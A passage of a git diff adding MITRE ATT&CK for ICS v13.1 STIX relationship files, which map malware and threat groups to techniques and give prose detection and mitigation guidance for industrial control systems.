Advisory (ICSA-14-178-01) Retrieved. 2019/04/01 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:19:04.571Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) payload gathers server information that includes CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth. This information helps indicate the role the server has in the control process. (Citation: ICS-CERT August 2018) (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06f15629-d050-434a-aed1-3bb3f90c97b2.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06f15629-d050-434a-aed1-3bb3f90c97b2.json new file mode 100644 index 0000000000000000000000000000000000000000..6b8f907652193d2699fa2bce398585bbc03cdda7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06f15629-d050-434a-aed1-3bb3f90c97b2.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--623c6ed4-501d-4959-986c-72c6cb055cf1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06f15629-d050-434a-aed1-3bb3f90c97b2", + "created": "2022-09-27T15:22:37.864Z", + "revoked": false, + "external_references": [ + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:22:37.864Z", + "description": "Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL) For added context on adversary procedures and background see [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd.json new file mode 100644 index 0000000000000000000000000000000000000000..6a83775c160e2cc2d582e9fb6fecfeb01cd247ff --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--217c2f46-98bd-4031-bc92-2f70d905eecc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:12:43.166Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if messages over serial COM ports are blocked.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07c0e166-f05e-413f-8f3e-f487317c9626.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07c0e166-f05e-413f-8f3e-f487317c9626.json new file mode 100644 index 0000000000000000000000000000000000000000..8c84bcd703496a3d5b2a9c842bc06386f8418180 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07c0e166-f05e-413f-8f3e-f487317c9626.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--79dc31fc-e363-4491-be71-f3762c1daf81", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--07c0e166-f05e-413f-8f3e-f487317c9626", + "created": "2023-03-22T15:53:59.953Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-22T15:53:59.953Z", + "description": "Devices and programs that receive command messages from remote systems (e.g., control servers) should verify those commands before taking any actions on them.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07f4d65d-4572-450f-8cb2-908fee97bd67.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07f4d65d-4572-450f-8cb2-908fee97bd67.json new file mode 100644 index 0000000000000000000000000000000000000000..d7a8bc1610475b7b32fd003891a4816526824d57 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07f4d65d-4572-450f-8cb2-908fee97bd67.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--f2f82719-f987-46cd-920c-cd4a94bab3e3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--07f4d65d-4572-450f-8cb2-908fee97bd67", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "Application control may be able to prevent the running of executables masquerading as other files.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08302021-aacf-428f-a0ce-e1034d925fb0.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08302021-aacf-428f-a0ce-e1034d925fb0.json new file mode 100644 index 0000000000000000000000000000000000000000..80a10430f0bc1f920864e2dabc28ea492854646d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08302021-aacf-428f-a0ce-e1034d925fb0.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--cd71570c-b9f4-47b7-a64c-f08980edd2a2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--08302021-aacf-428f-a0ce-e1034d925fb0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.115Z", + "relationship_type": "mitigates", + "description": "Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.\n", + "source_ref": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--088580e9-ccea-426e-9411-c1de60de650d.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--088580e9-ccea-426e-9411-c1de60de650d.json new file mode 100644 index 0000000000000000000000000000000000000000..956816c0ffae6215a764ce2942b30071539dae9e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--088580e9-ccea-426e-9411-c1de60de650d.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--43a39739-58d3-447d-858e-ba28bf65307c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--088580e9-ccea-426e-9411-c1de60de650d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.206Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7.json new file mode 100644 index 0000000000000000000000000000000000000000..46691c120f6d8268d44c03171ee2c412410606b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--2eaf09e1-84be-4ea0-9177-1f00128cdb36", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:57:47.375Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09977105-562f-4f45-a151-27a11a18031e.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09977105-562f-4f45-a151-27a11a18031e.json new file mode 100644 index 0000000000000000000000000000000000000000..71fcf46736ecf9d72b1bd070c3ae27287f81dcc2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09977105-562f-4f45-a151-27a11a18031e.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--602477fd-fbb3-4d1e-8f45-2156f314c36e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--09977105-562f-4f45-a151-27a11a18031e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.164Z", + "relationship_type": "mitigates", + "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9.json new file mode 100644 index 0000000000000000000000000000000000000000..c70dd65f6644df7f36681df80919b3f738d0f054 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--94e68f29-2e65-46c7-bda0-9a9310a0e6f6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:41:46.146Z", + "description": "Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0b7f643e-8975-4998-acbb-7405fa944a68.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0b7f643e-8975-4998-acbb-7405fa944a68.json new file mode 100644 index 0000000000000000000000000000000000000000..c399abda65be77e9675f41c5abcf14f51fa721fc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0b7f643e-8975-4998-acbb-7405fa944a68.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--2f5bf0b7-e8b8-4657-8eac-a98e7d79a2d8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b7f643e-8975-4998-acbb-7405fa944a68", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:54:38.303Z", + "description": "Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Also monitor executed commands and arguments that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae.json new file mode 100644 index 0000000000000000000000000000000000000000..8f0ad87b76303ff676473f98a152dbbcfe70d446 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--c39ce600-df27-4271-ac80-3c5454c730a1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jacqueline O'Leary et al. September 2017", + "description": "Jacqueline O'Leary et al. 2017, September 20 Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware Retrieved. 2019/12/02 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Junnosuke Yagi March 2017", + "description": "Junnosuke Yagi 2017, March 07 Trojan.Stonedrill Retrieved. 2019/12/05 ", + "url": "https://www.symantec.com/security-center/writeup/2017-030708-4403-99" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:41:15.111Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) utilize backdoors capable of capturing screenshots once installed on a system. (Citation: Jacqueline O'Leary et al. September 2017)(Citation: Junnosuke Yagi March 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444.json new file mode 100644 index 0000000000000000000000000000000000000000..fa53ecae325dad8d43433a999e63d902dff29389 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6b74b035-bc85-4b82-91e3-aceb2c225630", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017", + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov 2017, October 27 Bad Rabbit Ransomware Retrieved. 2019/10/27 ", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:30:30.761Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) ransomware spreads through drive-by attacks where insecure websites are compromised. While the target is visiting a legitimate website, a malware dropper is being downloaded from the threat actors infrastructure. (Citation: Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c284ce0-0be2-4164-b686-7c383b246aec.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c284ce0-0be2-4164-b686-7c383b246aec.json new file mode 100644 index 0000000000000000000000000000000000000000..2b063bf75f9c556a278a1a766dff43b355835017 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c284ce0-0be2-4164-b686-7c383b246aec.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--76471a1a-c9c7-4b78-a646-5604cd7e0068", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c284ce0-0be2-4164-b686-7c383b246aec", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Research Whitepapers September 2018", + "description": "ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + }, + { + "source_name": "Intel", + "description": "Intel ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 Intel Hardware-based Security Technologies for Intelligent Retail Devices Retrieved. 2020/09/25 ", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf" + }, + { + "source_name": "N/A", + "description": "N/A Trusted Platform Module (TPM) Summary Retrieved. 2020/09/25 ", + "url": "https://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:19:56.151Z", + "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: N/A) Move system's root of trust to hardware to prevent tampering with the SPI flash memory. (Citation: ESET Research Whitepapers September 2018) Technologies such as Intel Boot Guard can assist with this. (Citation: Intel)\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a.json new file mode 100644 index 0000000000000000000000000000000000000000..6a7568cb4931618fb8e66b2686053fd63be43521 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--b843a98a-0981-4341-9010-ac2667be9d75", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a", + "created": "2022-09-27T15:49:26.908Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:49:26.908Z", + "description": "Monitor asset application logs for information that indicate task parameters have changed.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f.json new file mode 100644 index 0000000000000000000000000000000000000000..7c504416f282f6fcf3dd36dcae4362fa18163cb4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--8cc41a5f-a1b9-4e71-a0fc-5bf670177701", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.070Z", + "relationship_type": "mitigates", + "description": "Provide an alternative method for sending critical commands message to outstations, this could include using radio/cell communication to send messages to a field technician that physically performs the control function.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d305450-d5ca-46fe-8583-36c983dd0a88.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d305450-d5ca-46fe-8583-36c983dd0a88.json new file mode 100644 index 0000000000000000000000000000000000000000..132fcd6bdc9fe23033dc9f26d4db307582e9e7ae --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d305450-d5ca-46fe-8583-36c983dd0a88.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--bd6c1d55-2ec8-451e-a9c5-83f9e6368d0e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0d305450-d5ca-46fe-8583-36c983dd0a88", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:43:33.144Z", + "description": "Monitor ICS management protocols for functions that change an asset\u2019s operating mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d4f2f88-e176-42c7-8258-52b345045662.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d4f2f88-e176-42c7-8258-52b345045662.json new file mode 100644 index 0000000000000000000000000000000000000000..b69a07fed7452dfee7633a653dba56c65fba8d22 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d4f2f88-e176-42c7-8258-52b345045662.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--446995be-f7e4-4d09-9012-3fa218855386", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0d4f2f88-e176-42c7-8258-52b345045662", + "created": "2022-09-28T20:29:51.844Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA 